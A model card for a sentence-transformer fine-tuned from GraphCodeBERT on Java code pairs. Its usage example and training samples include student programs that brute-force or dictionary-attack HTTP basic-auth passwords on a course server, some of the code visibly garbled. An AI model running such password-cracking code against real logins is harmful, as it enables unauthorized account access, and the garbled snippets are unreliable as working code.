SentenceTransformer based on microsoft/graphcodebert-base
This is a sentence-transformers model fine-tuned from microsoft/graphcodebert-base. It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: microsoft/graphcodebert-base
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
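For readers unfamiliar with the similarity function named above, here is a minimal pure-Python sketch of cosine similarity. The function name and the toy 3-dimensional vectors are illustrative assumptions; real embeddings from this model have 768 dimensions, and the library computes this in a vectorized way.

```python
import math


def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    if len(u) != len(v):
        raise ValueError("vectors must have the same length")
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0.0 or norm_v == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_u * norm_v)


# Toy vectors standing in for 768-dimensional embeddings (hypothetical values).
parallel = cosine_similarity([1.0, 2.0, 3.0], [2.0, 4.0, 6.0])
orthogonal = cosine_similarity([1.0, 0.0, 0.0], [0.0, 1.0, 0.0])
print(parallel, orthogonal)
```

Because the score depends only on direction, scaling an embedding does not change its similarity to other embeddings.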
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
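The Pooling module above has only `pooling_mode_mean_tokens` enabled, so the sentence embedding is the average of the token embeddings. A rough pure-Python sketch of that idea follows. The helper name `mean_pool` and the toy 2-dimensional token vectors are assumptions for illustration; the library itself operates on batched tensors.

```python
def mean_pool(token_embeddings, attention_mask):
    """Average the token vectors whose mask entry is 1; skip padding (mask 0)."""
    if len(token_embeddings) != len(attention_mask):
        raise ValueError("one mask entry is required per token")
    kept = [vec for vec, m in zip(token_embeddings, attention_mask) if m == 1]
    if not kept:
        raise ValueError("at least one unmasked token is required")
    dim = len(kept[0])
    return [sum(vec[i] for vec in kept) / len(kept) for i in range(dim)]


# Two real tokens followed by one padding token (hypothetical values).
tokens = [[1.0, 2.0], [3.0, 4.0], [100.0, 100.0]]
mask = [1, 1, 0]
print(mean_pool(tokens, mask))  # [2.0, 3.0]
```

The padding vector is excluded, which is why the large values in the third row do not affect the result.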
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-GraphCodeBERT-ST")
# Run inference
sentences = [
'import java.io.*;\nimport java.net.*;\nimport java.net.HttpURLConnection;\nimport javax.net.*;\nimport java.security.cert.*;\n\npublic class Dictionary\n{\n\tpublic static void main(String[] args)\n\t{\n\t\tBufferedReader in = null;\n\t\tboolean found = true;\n\t\tString word = null;\n\t\tString cmd = null;\n\t\tRuntime run = Runtime.getRuntime();\n\t\tProcess pro = null;\n\t\tBufferedReader inLine = null;\n\n\n\n\t\tString str = null;\n\t\tURLConnection connection = null;\n\n\t\ttry\n\t\t{\n\t\t\tFileReader reader = new FileReader("words");\n\t\t\tin = new BufferedReader(reader);\n\t\t\tSystem.out.println(" cracking....");\n\t\t\t\n\t\t\t{\n\t\t\t\tfound = true;\n\t\t\t\tword = new String(in.readLine());\n\n\t\t\t\tcmd = "wget --http-user= --http-passwd="+word +" http://sec-crack.cs.rmit.edu./SEC/2/index.php";\n\n\t\t\t\tpro = run.exec(cmd);\n\t\t\t\tinLine = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\n\n\t\t\t\tif((str=inLine.readLine())!=null)\n\t\t\t\t{\n\n\t\t\t\t\twhile ((str=inLine.readLine())!=null)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (str.endsWith("Required"))\n\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\tfound = false;\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\t\t\t\t}\n\n\n\n\n\n\n\t\t\t\trun.gc();\n\t\t\t}\n\t\t\twhile (!found);\n\n\n\n\n\n\t\t}\n\t\tcatch (FileNotFoundException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n\t\tcatch (IOException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n catch (NullPointerException ex)\n {\n System.out.println(word);\n }\n\t\tfinally\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif (in!= null)\n\t\t\t\t{\n\t\t\t\t\tin.print();\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch (IOException e) {}\n\t\t}\n\t\tif (found == true)\n\t\t\tSystem.out.println("The password is :" + word);\n else\n System.out.println("NOT FOUND!");\n\t}\n}',
'\nimport java.net.*;\nimport java.io.*;\nimport java.misc.*;\nimport java.io.BufferedInputStream;\nimport java.awt.*;\nimport java.awt.event.*;\n\npublic class WriteFile\n{\n String url;\n String fileName;\n int flag;\n private PrintWriter out2;\n private TextArea response;\n int status;\n int mailFlag;\n\n public WriteFile (String newUrl, String newFileName, int newFlag)\n {\n url = newUrl;\n fileName = newFileName;\n PrintWriter printW = null;\n FileOutputStream fout;\n flag = newFlag;\n status = 0;\n mailFlag = 0;\n\n \n File file = new File(fileName);\n file.delete();\n\n try\n {\n fout = new FileOutputStream(fileName,true);\n printW = new PrintWriter(fout);\n }\n catch (IOException ioe)\n {\n System.out.println("IO Error : " + ioe);\n }\n\n\n URL u;\n URLConnection uc;\n\n try\n {\n u = new URL(url);\n try\n {\n \n uc = u.openConnection();\n\n InputStream content = (InputStream)uc.getInputStream();\n BufferedReader in = new BufferedReader (new InputStreamReader(content));\n\n String line;\n\n \n while ((line = in.readLine()) != null)\n {\n \n printW.println(line);\n\n }\n }\n catch (Exception e)\n {\n System.out.println("Error: " + e);\n }\n }\n catch (MalformedURLException e)\n {\n System.out.println(url + " is not a parseable URL");\n }\n \n printW.print();\n\n\n if(flag == 1)\n {\n \n compareDiff("@.rmit.edu.");\n }\n }\n\n String loadStream(InputStream in) throws IOException\n {\n int ptr = 0;\n in = new BufferedInputStream(in);\n StringBuffer buffer = new StringBuffer();\n\n while( (ptr = in.next()) != -1 )\n {\n status++;\n \n buffer.append((char)ptr);\n mailFlag++;\n \n }\n return buffer.toString();\n }\n\n public void compareDiff(String emailAdd)\n {\n String cmds = "diff test1.txt test2.txt";\n PrintWriter printW2 = null;\n FileOutputStream fout2;\n \n File file = new File("diff.txt");\n file.delete();\n String ;\n\n try\n {\n fout2 = new FileOutputStream("diff.txt",true);\n printW2 = new PrintWriter(fout2);\n }\n catch (IOException ioe)\n {\n 
System.out.println("IO Error : " + ioe);\n }\n\n try\n {\n\n\n \n Process ps = Runtime.getRuntime().exec(cmds);\n PrintWriter out = new PrintWriter(new OutputStreamWriter(ps.getOutputStream()));\n\n printW2.println(loadStream(ps.getInputStream())+"\\n");\n printW2.print();\n\n\n if(mailFlag != 0)\n {\n FileReader fRead2;\n BufferedReader buf2;\n\n try\n {\n fRead2 = new FileReader("diff.txt");\n buf2 = new BufferedReader(fRead2);\n String line2;\n int i=0;\n\n line = new String(" some changes the web as followed: \\n");\n \n Socket s = new Socket("wombat.cs.rmit.edu.", 25);\n out2 = new PrintWriter(s.getOutputStream());\n\n send(null);\n send("HELO cs.rmit.edu.");\n send("MAIL FROM: @.rmit.edu.");\n \n send("RCPT : @.rmit.edu.");\n send("DATA");\n \n\n while( (line2 = buf2.readLine()) != null)\n {\n \n line= new String(""+line2+"\\n");\n \n \n\n }\n \n \n \n out2.print();\n send(".");\n s.print();\n }\n catch(FileNotFoundException e)\n {\n System.out.println("File not found");\n }\n catch(IOException ioe)\n {\n System.out.println("IO Error " + ioe);\n }\n }\n\n System.out.println(loadStream(ps.getInputStream()));\n \n System.err.print(loadStream(ps.getErrorStream()));\n }\n catch(IOException ioe)\n {\n ioe.printStackTrace();\n }\n }\n\n public void send(String s) throws IOException\n {\n \tresponse = new TextArea();\n \tif(s != null)\n \t{\n response.append(s + "\\n");\n out2.println(s);\n\t out2.flush();\n\t}\n }\n\n public int getStatus()\n {\n return status;\n }\n}',
'import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\nclass Dictionary {\n\n private String password="";\n\n private int num=401;\n\n\n public static void main(String[] args) {\n\n\n Dictionary URLcon;\n\n int length = 0;\n\n String passwd="";\n\n int t0,t1;\n\n String line ="";\n \n if (args.length == 0) {\n \t\n System.err.println (\n \t\t\n \t\t"Usage : java BruteForce <username>");\n return;\n \t\n }\n \n String username = args[0];\n \n \n t0=System.currentTimeMillis();\n \n System.out.println (" " + new Date());\n System.out.println ("Using Dictionary method attack "+username+"\'s password. Please waiting.......");\n\n try{ BufferedReader in = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n while ((passwd=in.readLine())!=null) {\n\n \t URLcon = new Dictionary (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n \tdouble dt =t1-t0;\n\n \tSystem.out.println("It took "+DecimalFormat.getInstance().format(dt/1000)+ " seconds");\n \n System.out.println ("Finish " + new Date());\n \n \treturn;\n\n }\n\n\n \t}\n\n }catch (FileNotFoundException e){\n \tSystem.out.println(e);\n }catch (IOException e){\n \tSystem.out.println(e);\n }\n\n\n System.out.println(" not find the password");\n\n\n}\n\n public Dictionary (String password,String username) {\n\n \t String urlString = "http://sec-crack.cs.rmit.edu./SEC/2/" ;\n\n \n try {\n\n String userPassword = username+":"+password ;\n\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection) url.openConnection();\n\n uc.setRequestProperty ("Authorization", " " + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n catch(MalformedURLException e){\n \t System.out.println(e);\n }catch(IOException e){\n System.out.println(e);\n }\n\n\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
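Once a similarity matrix is available, one possible next step is to list snippet pairs from most to least similar. The sketch below is not part of the original example. `rank_pairs` is a hypothetical helper, and `toy_scores` holds made-up numbers rather than actual output of this model.

```python
def rank_pairs(similarity_matrix):
    """Return (i, j, score) for every pair i < j, highest score first."""
    n = len(similarity_matrix)
    pairs = [
        (i, j, float(similarity_matrix[i][j]))
        for i in range(n)
        for j in range(i + 1, n)
    ]
    return sorted(pairs, key=lambda p: p[2], reverse=True)


# Made-up 3 x 3 similarity scores, NOT produced by the model.
toy_scores = [
    [1.00, 0.35, 0.80],
    [0.35, 1.00, 0.20],
    [0.80, 0.20, 1.00],
]
for i, j, score in rank_pairs(toy_scores):
    print(f"snippets {i} and {j}: {score:.2f}")
```

With real output, the matrix returned by `model.similarity` can be converted first, for example `rank_pairs(similarities.tolist())`.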
Training Details
Training Dataset
Unnamed Dataset
- Size: 33,411 training samples
- Columns: sentence_0, sentence_1, and label
- Approximate statistics based on the first 1000 samples:
 | sentence_0 | sentence_1 | label |
---|---|---|---|
type | string | string | int |
details | min: 61 tokens, mean: 478.83 tokens, max: 512 tokens | min: 61 tokens, mean: 490.04 tokens, max: 512 tokens | 0: ~99.80%, 1: ~0.20% |
- Samples:
sentence_0 sentence_1 label
import java.net.*;
import java.io.*;
public class sendMail {
public void sendMail(String mailServer, String recipient, String result) {
try {
Socket s = new Socket(mailServer, 25);
BufferedReader in = new BufferedReader
(new InputStreamReader(s.getInputStream(), "8859_1"));
BufferedWriter out = new BufferedWriter
(new OutputStreamWriter(s.getOutputStream(), "8859_1"));
send(in, out, "HELO client");
send(in, out, "MAIL FROM: ");
send(in, out, "RCPT : " + recipient);
send(in, out, "DATA");
send(out, "Subject: ");
send(out, "From: Admin ");
send (out, "\n");
send(out, result);
send(out, "\n.\n");
send(in, out, "QUIT");
}
catch (Exception e) {
e.printStackTrace();
}
}
public void send(BufferedReader in, BufferedWriter out, String s) {
try {
out.write(s + "\n");
out.flush();
Sys...
import java.io.*;
import java.util.*;
import java.;
import java.net.*;
public class WatchDog
{
static Process p = null;
static Process qproc = null;
static BufferedReader bf = null;
static StringTokenizer tok = null;
static String Path = null;
static String str = null;
static String urlStr=null;
static boolean changed = false;
static File indexfile = new File("index.html");
static File tmpfile = new File("tmpindex.html");
static File mdfile = new File("md5file.txt");
static File tmpmdfile = new File("tmpmd5file.txt");
static PrintWriter mailwriter = null;
public static void main(String[] args)
{
urlStr = "http://www.cs.rmit.edu./";
try
{
mailwriter = new PrintWriter(new BufferedWriter(new FileWriter("tomail.txt", false)));
getLatest(urlStr);
parseFile();
mailwriter.read();
if(changed)
{
System.out.println("Sending Mail");
...
0
import java.io.*;
import java.net.*;
public class BruteForce
{
private String myUsername = "";
private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";
private int NUM_CHARS = 52;
public static void main(String args[])
{
BruteForce bf = new BruteForce();
}
public BruteForce()
{
generatePassword();
}
public void generatePassword()
{
int index1 = 0, index2, index3;
char passwordChars[] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',
'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',
'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
's', 't', 'u', 'v', 'w', 'x', 'y', 'z' };
while(index1 < NUM_CHARS)
{
index2 = 0;
while(index2 < NUM_CHARS)
{
...
public class HoldSharedData
{
private int numOfConnections = 0;
private int startTime;
private int totalTime = 0;
private String[] password;
private int pwdCount;
public HoldSharedData( int time, String[] pwd, int count )
{
startTime = time;
password = pwd;
pwdCount = count;
}
public int getPwdCount()
{
return pwdCount;
}
public void setNumOfConnections( )
{
numOfConnections ++;
}
public int getNumOfConnections()
{
return numOfConnections;
}
public int getStartTime()
{
return startTime;
}
public void setTotalTime( int newTotalTime )
{
totalTime = newTotalTime;
}
public int getTotalTime()
{
return totalTime;
}
public String getPasswordAt( int index )
{
return password[index];
}
}
0
import java.net.*;
import java.io.*;
public class sendMail {
public void sendMail(String mailServer, String recipient, String result) {
try {
Socket s = new Socket(mailServer, 25);
BufferedReader in = new BufferedReader
(new InputStreamReader(s.getInputStream(), "8859_1"));
BufferedWriter out = new BufferedWriter
(new OutputStreamWriter(s.getOutputStream(), "8859_1"));
send(in, out, "HELO client");
send(in, out, "MAIL FROM: ");
send(in, out, "RCPT : " + recipient);
send(in, out, "DATA");
send(out, "Subject: ");
send(out, "From: Admin ");
send (out, "\n");
send(out, result);
send(out, "\n.\n");
send(in, out, "QUIT");
}
catch (Exception e) {
e.printStackTrace();
}
}
public void send(BufferedReader in, BufferedWriter out, String s) {
try {
out.write(s + "\n");
out.flush();
Sys...
import java.net.*;
import java.io.*;
public class Base64Encoder
{
private final static char base64Array [] = {
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9', '+', '/'
};
public static String encode (String string)
{
String encodedString = "";
byte bytes [] = string.getBytes ();
int i = 0;
int pad = 0;
while (i < bytes.length)
{
byte b1 = bytes [i++];
byte b2;
byte b3;
if (i >= bytes.length)
{
b2 = 0;
b3 = 0;
pad = 2;
}
else
{
b2 = bytes [i++];
if (i >= bytes.length)
...
0
- Loss: BatchAllTripletLoss
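To make the loss named above more concrete, here is a minimal pure-Python sketch of the "batch all" triplet idea described by Hermans et al. (cited under Citation). It forms every valid (anchor, positive, negative) triplet in a batch and averages the hinge loss over the triplets that violate the margin. The Euclidean distance, the margin of 1.0, and the toy 2-dimensional embeddings are assumptions for illustration; the library's vectorized implementation may differ in its defaults and details.

```python
import math


def euclidean(u, v):
    """Euclidean distance between two equal-length vectors."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(u, v)))


def batch_all_triplet_loss(embeddings, labels, margin=1.0):
    """Mean hinge loss over all valid triplets with a positive loss."""
    n = len(labels)
    active = []
    for a in range(n):
        for p in range(n):
            # A positive shares the anchor's label but is a different item.
            if p == a or labels[p] != labels[a]:
                continue
            for neg in range(n):
                # A negative has a different label from the anchor.
                if labels[neg] == labels[a]:
                    continue
                loss = (
                    euclidean(embeddings[a], embeddings[p])
                    - euclidean(embeddings[a], embeddings[neg])
                    + margin
                )
                if loss > 0.0:
                    active.append(loss)
    return sum(active) / len(active) if active else 0.0


# Hypothetical toy batch: three 2-dimensional embeddings.
toy_embeddings = [[0.0, 0.0], [0.0, 1.0], [3.0, 0.0]]
print(batch_all_triplet_loss(toy_embeddings, [1, 1, 0]))  # well separated
print(batch_all_triplet_loss(toy_embeddings, [1, 0, 1]))  # margin violated
```

The first call returns zero because both same-label items are already closer to each other than to the negative by more than the margin; the second call returns a positive loss.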
Training Hyperparameters
Non-Default Hyperparameters
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- multi_dataset_batch_sampler: round_robin
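As a rough illustration, the non-default values listed here could be passed to the Sentence Transformers training API along the following lines. This is a sketch and not the author's training script: `output_dir` is a hypothetical path, and every argument not shown is assumed to stay at its library default.

```python
from sentence_transformers import SentenceTransformerTrainingArguments
from sentence_transformers.training_args import MultiDatasetBatchSamplers

# Only the non-default values from this card are set explicitly.
args = SentenceTransformerTrainingArguments(
    output_dir="output/graphcodebert-st",  # hypothetical path, not from the card
    per_device_train_batch_size=16,
    per_device_eval_batch_size=16,
    num_train_epochs=1,
    multi_dataset_batch_sampler=MultiDatasetBatchSamplers.ROUND_ROBIN,
)
```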
All Hyperparameters
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: round_robin
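The combination of `lr_scheduler_type: linear`, `learning_rate: 5e-05`, and `warmup_steps: 0` implies a learning rate that decays linearly from its initial value to zero over training. A small sketch of that schedule is given below. The function name `linear_lr` is hypothetical, and the total of 2089 steps is an assumption derived from 33,411 samples at batch size 16 on a single device; it is not stated in the card.

```python
def linear_lr(step, total_steps, base_lr=5e-05, warmup_steps=0):
    """Linear warmup (if any) followed by linear decay to zero."""
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    remaining = max(0, total_steps - step)
    return base_lr * remaining / max(1, total_steps - warmup_steps)


TOTAL_STEPS = 2089  # assumed: ceil(33411 / 16), single device, 1 epoch
for step in (0, 500, 1000, 1500, 2000):
    print(step, linear_lr(step, TOTAL_STEPS))
```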
Training Logs
Epoch | Step | Training Loss |
---|---|---|
0.2393 | 500 | 0.1754 |
0.4787 | 1000 | 0.1994 |
0.7180 | 1500 | 0.209 |
0.9574 | 2000 | 0.1941 |
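The Epoch column can be related to the Step column with a little arithmetic. The sketch below assumes a single device, no gradient accumulation, and a final partial batch that is kept, which is consistent with the hyperparameters listed in this card but is not confirmed by it. The helper names are hypothetical.

```python
import math


def steps_per_epoch(num_samples, batch_size):
    """Number of optimizer steps in one epoch, keeping the last partial batch."""
    return math.ceil(num_samples / batch_size)


def epoch_fraction(step, num_samples, batch_size):
    """Fraction of an epoch completed after `step` steps."""
    return step / steps_per_epoch(num_samples, batch_size)


# 33,411 training samples and a per-device batch size of 16, as reported above.
for step in (500, 1000, 1500, 2000):
    print(step, round(epoch_fraction(step, 33411, 16), 4))
```

Under these assumptions one epoch is 2089 steps, and the computed fractions agree with the Epoch values in the table.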
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
BatchAllTripletLoss
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}